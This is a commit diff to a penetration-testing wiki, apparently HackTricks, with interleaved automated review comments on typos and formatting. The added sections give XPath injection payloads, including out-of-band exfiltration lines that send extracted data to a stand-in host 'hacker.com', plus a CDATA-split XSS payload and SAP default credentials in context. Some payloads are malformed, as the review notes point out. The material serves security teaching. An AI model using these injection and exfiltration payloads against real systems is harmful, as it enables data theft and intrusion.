GitBook: [master] 7 pages and 14 assets modified
Binary assets changed in this commit (the rendered page shows only sizes for some of them; file names are kept where the page shows them):

* four images modified or renamed with their size unchanged: 341 KiB, 341 KiB, 10 KiB, 10 KiB (names not shown)
* .gitbook/assets/image (479) (2) (1).png: new file, 18 KiB; another image changed from 18 KiB to 38 KiB (name not shown)
* .gitbook/assets/image (507) (1) (1).png: new file, 2.8 KiB; another image changed from 2.8 KiB to 35 KiB (name not shown)
* .gitbook/assets/image (532).png: new file, 66 KiB
* .gitbook/assets/image (533).png: new file, 35 KiB

@ -134,7 +134,7 @@ Some interesting attributes:
* [$Data](https://flatcap.org/linux-ntfs/ntfs/attributes/data.html) \(among others\):
* Contains the file's data or the indication of the sectors where the data resides. In the following example the attribute data is not resident so the attribute gives information about the sectors where the data resides.

![](../../../.gitbook/assets/image%20%28507%29%20%281%29.png)
![](../../../.gitbook/assets/image%20%28507%29%20%281%29%20%281%29.png)

![](../../../.gitbook/assets/image%20%28512%29.png)

@ -130,7 +130,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi

Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced \(search for `Section start`\).

![](../../../.gitbook/assets/image%20%28477%29%20%282%29%20%281%29.png)
![](../../../.gitbook/assets/image%20%28477%29%20%282%29%20%282%29%20%281%29.png)

### USB Detective

@ -601,7 +601,7 @@ Many apps log informative \(and potentially sensitive\) messages to the console
5. Reproduce the problem.
6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window.

![](../../.gitbook/assets/image%20%28466%29%20%282%29%20%281%29.png)
![](../../.gitbook/assets/image%20%28466%29%20%282%29%20%282%29%20%281%29.png)

You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command:

@ -506,6 +506,10 @@ curl http://rancher-metadata/<version>/<path>

The difference between a blind SSRF and a not blind one is that in the blind you cannot see the response of the SSRF request. Then, it is more difficult to exploit because you will be able to exploit only well-known vulnerabilities.

### Time based SSRF

**Checking the time** of the responses from the server it might be **possible to know if a resource exists or not** \(maybe it takes more time accessing an existing resource than accessing one that doesn't exist\)

## Detect SSRF

You can use [https://github.com/teknogeek/ssrf-sheriff](https://github.com/teknogeek/ssrf-sheriff) to create an HTTP server that will respond correctly to a lot of different requests \(GET, POST, PTU, DELETE, JSON, TXT, GIF, MP3...\).
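Review bot: `PTU` in the last context line of this hunk (`GET, POST, PTU, DELETE, ...`) is a typo for `PUT`; since the surrounding lines are being touched anyway, fix it here. In the added `### Time based SSRF` paragraph the sentence has no terminating period, and the heading would normally be hyphenated (`Time-based SSRF`). The claim in parentheses is hedged with "maybe"; stating it as "an existing resource often takes longer to fetch than a non-existent one, so response time can leak existence" would read more clearly without changing what it says.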
@ -101,7 +101,7 @@ Info about how to make queries: [https://www.w3schools.com/xml/xpath\_syntax.asp

## Example

```text
```markup
<?xml version="1.0" encoding="ISO-8859-1"?>
<data>
<user>
@ -122,6 +122,8 @@ Info about how to make queries: [https://www.w3schools.com/xml/xpath\_syntax.asp
</data>
```

### Access the information

```text
All names - [pepe, mark, fino]
name
@ -149,6 +151,43 @@ string-length(//user[position()=1]/child::node()[position()=1]) #Length of "pepe
substrig(//user[position()=2/child::node()[position()=1],2,1) #Substring of mark: pos=2,length=1 --> "a"
```

### Identify & stealing the schema

```python
and count(/*) = 1 #root
and count(/*[1]/*) = 2 #count(root) = 2 (a,c)
and count(/*[1]/*[1]/*) = 1 #count(a) = 1 (b)
and count(/*[1]/*[1]/*[1]/*) = 0 #count(b) = 0
and count(/*[1]/*[2]/*) = 3 #count(c) = 3 (d,e,f)
and count(/*[1]/*[2]/*[1]/*) = 0 #count(d) = 0
and count(/*[1]/*[2]/*[2]/*) = 0 #count(e) = 0
and count(/*[1]/*[2]/*[3]/*) = 1 #count(f) = 1 (g)
and count(/*[1]/*[2]/*[3]/[1]*) = 0 #count(g) = 0

#The previous solutions are the representation of a schema like the following
#(at this stage we don't know the name of the tags, but jus the schema)
<root>
<a>
<b></b>
</a>
<c>
<d></d>
<e></e>
<f>
<h></h>
</f>
</c>
</root>

and name(/*[1]) = "root" #Confirm the name of the first tag is "root"
and substring(name(/*[1]/*[1]),1,1) = "a" #First char of name of tag `<a>` is "a"
and string-to-codepoints(substring(name(/*[1]/*[1]/*),1,1)) = 105 #Firts char of tag `<b>`is codepoint 105 ("i") (https://codepoints.net/)

#Stealing the schema via OOB
doc(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
doc-available(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
```

## Authentication Bypass

### **Example of queries:**
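Review bot: the last `count()` line of the added block, `count(/*[1]/*[2]/*[3]/[1]*)`, is not valid XPath; following the pattern of the lines above it, it should be `count(/*[1]/*[2]/*[3]/*[1]/*) = 0`. The comment on the `count(f)` line names the child `g`, but the schema sketch below shows `<h></h>` under `<f>`; pick one name. The context line at the top, `substrig(//user[position()=2/child::node()[position()=1],2,1)`, has a typo (`substring`) and is missing the `]` that closes `position()=2`. Minor: `jus` should be `just`, `Firts` should be `First`, a space is missing in `` `<b>`is ``, and `string-to-codepoints()`, `doc()` and `doc-available()` are XPath 2.0 functions, which deserves a one-line note since the earlier examples on the page are plain XPath 1.0. The fence is tagged `python` for XPath content; `text` would avoid misleading highlighting.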
@ -228,17 +267,18 @@ The output contains strings and the user can manipulate the values to search:

### **Get length of a value and extract it by comparisons:**

```text
```bash
' or string-length(//user[position()=1]/child::node()[position()=1])=4 or ''=' #True if length equals 4
' or substring((//user[position()=1]/child::node()[position()=1]),1,1)="a" or ''=' #True is first equals "a"

Other way
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)

... and ( if ( $employee/role = 2 ) then error() else 0 )... #When error() is executed it rises an error and never returns a value
```

### **Example:**
### **Python Example**

```text
```python
import requests, string

flag = ""
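Review bot: the fence is changed from `text` to `bash` although the block contains XPath payloads, not shell; `text` is the honest tag (the `#` comments only happen to look like shell comments). In that block, `#True is first equals "a"` should read `#True if first char equals "a"`, and `it rises an error` should be `it raises an error`. The replacement heading `### **Python Example**` keeps the bold markers inside the heading; `**` is redundant there, and the same applies to the `### **Get length ...**` heading above.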
@ -259,6 +299,31 @@ for i in range(1, l + 1): #print("[i] Looking for char number " + str(i))
break
```

### Read file

```python
(substring((doc('file://protected/secret.xml')/*[1]/*[1]/text()[1]),3,1))) < 127
```

## OOB Exploitation

```python
doc(concat("http://hacker.com/oob/", RESULTS))
doc(concat("http://hacker.com/oob/", /Employees/Employee[1]/username))
doc(concat("http://hacker.com/oob/", encode-for-uri(/Employees/Employee[1]/username)))

#Instead of doc() you can use the function doc-available
doc-available(concat("http://hacker.com/oob/", RESULTS))
#the doc available will respond true or false depending if the doc exists,
#user not(doc-available(...)) to invert the result if you need to
```

### Automatic tool

{% embed url="https://xcat.readthedocs.io/" %}



## References

[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20injection)
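Review bot: the added `### Read file` payload has unbalanced parentheses: `(substring((doc('file://protected/secret.xml')/*[1]/*[1]/text()[1]),3,1))) < 127` closes one more `)` than it opens. Independently of that, `substring()` returns a one-character string, so comparing it with `127` is a type error in XPath 2.0 and a comparison against NaN (always false) in XPath 1.0; the codepoint comparison shown earlier on the page wraps the value in `string-to-codepoints(...)` first, and this line should do the same. In the OOB block, `#user not(doc-available(...))` should be `#use not(...)`, and `depending if the doc exists` reads better as `depending on whether the doc exists`. Style: three blank lines follow the xcat `{% embed %}` before `## References`; one is enough, and both fences here are tagged `python` for XPath content.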
@ -314,6 +314,12 @@ Once the server has downloaded your file, you need to find its location by brows
Writing files in a temporary directory can help to e**scalate another vulnerability that involves a path traversal** \(such as local file include, template injection, XSLT RCE, deserialization, etc\).
{% endhint %}

### XSS

```markup
<![CDATA[<]]>script<![CDATA[>]]>alert(1)<![CDATA[<]]>/script<![CDATA[>]]>
```

### DoS

#### Billion Laugh Attack
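Review bot: the first context line has the opening bold marker inside a word, `e**scalate another vulnerability that involves a path traversal**`; it should be `**escalate another vulnerability that involves a path traversal**`. The added `### XSS` section is only a payload with no explanation; one sentence saying that the parser concatenates the CDATA sections with the surrounding text, so the value the application receives is `<script>alert(1)</script>` even though no literal tag appears in the input, would tell the reader why it works and what an output filter has to look at. The heading `#### Billion Laugh Attack` should be `#### Billion Laughs Attack`, the usual name of the technique.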
@ -343,6 +349,10 @@ h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
```

#### Quadratic Blowup Attack

![](../.gitbook/assets/image%20%28479%29.png)

## Hidden XXE Surfaces

### XInclude
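Review bot: the new `#### Quadratic Blowup Attack` section consists of a single screenshot (`image (479).png`) and no text. The Billion Laughs section just above keeps its payload as text inside a fenced block, which is searchable, copyable and readable in a diff; this section should do the same, plus one sentence describing what the attack is (one large entity referenced many times rather than nested entities) so the heading is not the only content.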
@ -1,6 +1,6 @@
# Pentesting SAP

### Introduction about SAP
## Introduction about SAP

SAP stands for Systems Applications and Products in Data Processing. SAP, by definition, is also the name of the ERP \(Enterprise Resource Planning\) software as well as the name of the company.
SAP system consists of a number of fully integrated modules, which covers virtually every aspect of business management.
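Review bot: the heading promotion to `##` is consistent with the rest of this file. While these lines are in view, the context text could use a grammar pass: `Systems Applications and Products` needs a comma (`Systems, Applications and Products`), `SAP system consists` should be `An SAP system consists`, and `which covers` should be `which cover` (the subject is `modules`).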
@ -15,7 +15,7 @@ You’d be surprised if you knew how often these **passwords aren’t changed in
Try to get access to the shell of any server using username <SID>adm.
Bruteforcing can help, whoever there can be Account Lockout mechanism.

### Discovery
## Discovery

> Next section is mostly from [https://github.com/shipcod3/mySapAdventures](https://github.com/shipcod3/mySapAdventures) from user shipcod3!

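Review bot: the context line `Bruteforcing can help, whoever there can be Account Lockout mechanism.` has a wrong word and a missing article; it should read `Brute-forcing can help; however, there may be an account lockout mechanism.` Since the hunk already edits the heading directly below it, this is the right moment to fix it.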
@ -63,7 +63,7 @@ msf auxiliary(sap_service_discovery) > run
[*] 192.168.96.101: - [SAP] Beginning service Discovery '192.168.96.101'
```

#### Testing the Thick Client / SAP GUI
### Testing the Thick Client / SAP GUI

Here is the command to connect to SAP GUI
`sapgui <sap server hostname> <system number>`
@ -126,7 +126,7 @@ BWDEVELOPER:Down1oad:001
* Check if you can execute system commands / run scripts in the client.
* Check if you can do XSS on BAPI Explorer

### Testing the web interface
## Testing the web interface

* Crawl the URLs \(see discovery phase\).
* Fuzz the URLs like in the discovery phase. Here is what [http://SAP:50000/index.html](http://sap:50000/index.html) looks like:
@ -176,7 +176,7 @@ This XML file does not appear to have any style information associated with it.
</SOAP-ENV:Envelope>
```

### Attack!
## Attack!

* Check if it runs on old servers or technologies like Windows 2000.
* Plan the possible exploits / attacks, there are a lot of Metasploit modules for SAP discovery \(auxiliary modules\) and exploits:
@ -278,14 +278,14 @@ bizploit/plugins> back
bizploit> start
```

### Other Useful Tools for Testing
## Other Useful Tools for Testing

* [PowerSAP](https://github.com/airbus-seclab/powersap) - Powershell tool to assess sap security
* [Burp Suite](https://portswigger.net/burp) - a must have for directory fuzzing and web security assessments
* [pysap](https://github.com/SecureAuthCorp/pysap) - Python library to craft SAP network protocol packets
* [https://github.com/gelim/nmap-erpscan](https://github.com/gelim/nmap-erpscan) - Help nmap to detect SAP/ERP

### References
## References

* [SAP Penetration Testing Using Metasploit](http://information.rapid7.com/rs/rapid7/images/SAP%20Penetration%20Testing%20Using%20Metasploit%20Final.pdf)
* [https://github.com/davehardy20/SAP-Stuff](https://github.com/davehardy20/SAP-Stuff) - a script to semi-automate Bizploit
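Review bot: the tool descriptions in the context lines have casing and grammar slips worth fixing while the headings around them are being edited: `Powershell tool to assess sap security` should be `PowerShell tool to assess SAP security`, `a must have` should be `a must-have`, and `Help nmap to detect SAP/ERP` should be `Helps nmap detect SAP/ERP`. The `##` promotion of both headings matches the earlier hunks in this file.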